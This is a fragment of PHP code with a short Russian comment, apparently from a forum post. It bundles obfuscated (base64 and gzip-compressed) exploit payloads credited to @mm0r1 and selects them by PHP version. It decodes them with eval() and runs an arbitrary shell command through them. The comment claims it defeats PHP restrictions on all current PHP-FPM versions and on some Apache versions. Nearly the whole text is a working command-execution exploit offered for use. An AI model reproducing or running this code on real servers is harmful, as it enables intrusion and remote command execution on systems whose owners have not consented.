'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'); $pocs['mm0r1_concat'] = array('v' => ($v > 80014 && $v < 80111), 'r' => 'new Pwn($'.$c.')', 'c' =>'eNqtV1tvo0YUfs+vmFrIgpqswE5tJw6pvE20SS/ZNJc+rGuhMQxrEgzWABtnt/7vPTNcPAwQZ6taijwx53zn/s3BCXAco0sSrAlF39A6XQS+gxSsI2UBf84EbQ8cLnPzHKJvBwg+ThTGCfrl8uH6N/t8ej+1764+XSALGZuhMalJ5A8/XVyf2+cX7x8+2O8frn4/Rz+jmATeyYmM0wOcvoFOmh+L+Hf3t1fXHwoDzWiHgGaO4cucHAiql/c7p01zPJEeNQAXGjXAPGVeGjqJH4XItjkOTZ1EVZyVq+VZYx8voqriM6sTBN+nyOSHXk8UYh/lM42i1WxemsdBEDlqdhbc0yZvV6sGJmhuy1N5UCAGByc2xGFj16UlIPzQXycQRbL048OzJcFrOyD4SdV0ZA4FUMXzg+AN7u8UMkS8cL4jaAXECwdrPvcqPZF1j2zOo4SoJYqIXATIJ8NCIXnOx2Qn43sqGAtIqO6c16Cq0CGDwUiuKSVJSkMx7c3GAAbsdQJCks6kTWQBIkXLqcoGbG1bZR3e5h4hrocdIuYgk7CXOHQDQmOWxEyVksCmBLuqUSmRE0RxSkmZcVkYBrdR3iGiNEhWkdjIm4aQ/B3CAse+Y7NIBe8+k8QWHqiCnYr5r75nxy9xQlZV3ew3VQSv6Hn4CbByzMjzeP5GxqR9jlnFx/zcs9C4Ns27PD1TP4GGq1noga7+aooUX2uc2TeBG5vBGAZUR0dii+d1ZzIxSSCcm8sb+4/prx9v7b8ubu+uPl4jy4J4gKtZ/MDJQPHjyfeZlqzoYlnas150WDnfPdQcFyPvdodYR+oN0EIWVHmytIy23wDbgpiGEGcdNhPIp35N/S84IbtrQ2BSoXsUTFkaZrO5jmbz+c4GWLAJpVE5vGrJBhpKY4LULtPVUVdZpF6tITNYU7o9QJJxL/AnJWuCE7Xz98YwOjrad4FUGJnSmTlH7/aQONygOXd2ppTil47Y3RlVcodez1pO3yz/YtbW+CWIsAvBrLHzpHb+/BGCMDYuzNWCEI+dHeyRBV4QKKPM/IX2u2oupi2J2EVSaGqNVPb/lJJ9FWb+Y1ULfSCE/UXsbDqvl6BkfyUbcNGrvI6NqwNMNuQ+19lvIieYkkS+4CBlxQuRRLjAzahKzkrYsmSVjsxyXE6zbHtyluAnN4G67O705EUre3Z2BsZlUm6PgiWJNVuT2w0cYxp5c2ZLp3hB5vYtVN0/ygVCqywpYO0HK7NXaHYtpJro9BSxh/A10DS+0woXSzGEXOH1ArVdqhUmyxldeL5z0o3k2ng2CRP6Iu8N0qzmoiFe1TaMHEBHQ0meJaRQsfhbizv8aXQ0GoyORwO5R8REyH5At4wl7K00kFzK4m80Qpug56UfkNJFXhxD25/iys4jk16GCe8dpM4LvIf4u45Rz4UcFlsS8sxMx6jbreXDD23MKFttysgRU9drOuwz6xvm2BgNYA2B07FxbPTZqW8YxwODn0z221xrKoKyitw0ILxutf1TsJ/voK+py5oycoM6y1MFIWuco1F/aA6PhmRosgZq8ntPA4G74wZ725auqjBMnOBEfPPMblol9r+SJhKGCyBepp4HXSJfa5lOtQNl9JK+4QAaa0awjUTGIiNxzAm4ujE/ssyHGc/AP2cZRT8eHjZ2LMM4Pa0QbOXZPxaKqMv9mYE7QN2P88YNuUh/rlhEuT34F11ikeU='); foreach($pocs as $pocname => $poc) { if(!$poc['v']) continue; switch($cmd){ case 'check': return $pocname; break; default: ob_start(); eval('$'.$c.' = "(echo \'via '.$pocname.':\';'.addslashes($cmd).') 2>&1";echo '.$poc['r'].';'.gzuncompress(base64_decode($poc['c']))); $res = ob_get_contents(); ob_end_clean(); if(strpos($res, $pocname)) return $res; } } return (isset($res) ? $c.' for '.$v.' fails ;( ' : false);} Успешно отрабатывает на всех текущих версиях PHP-FPM. С апачем, как всегда, небольшие трудности, пока только два сплоита от @mm0r1 (filter и concat), которые дают обход на 7.0 >= 7.4.25 и 8.0 >= 8.1.11. Посмотреть последние изменения можно тут.
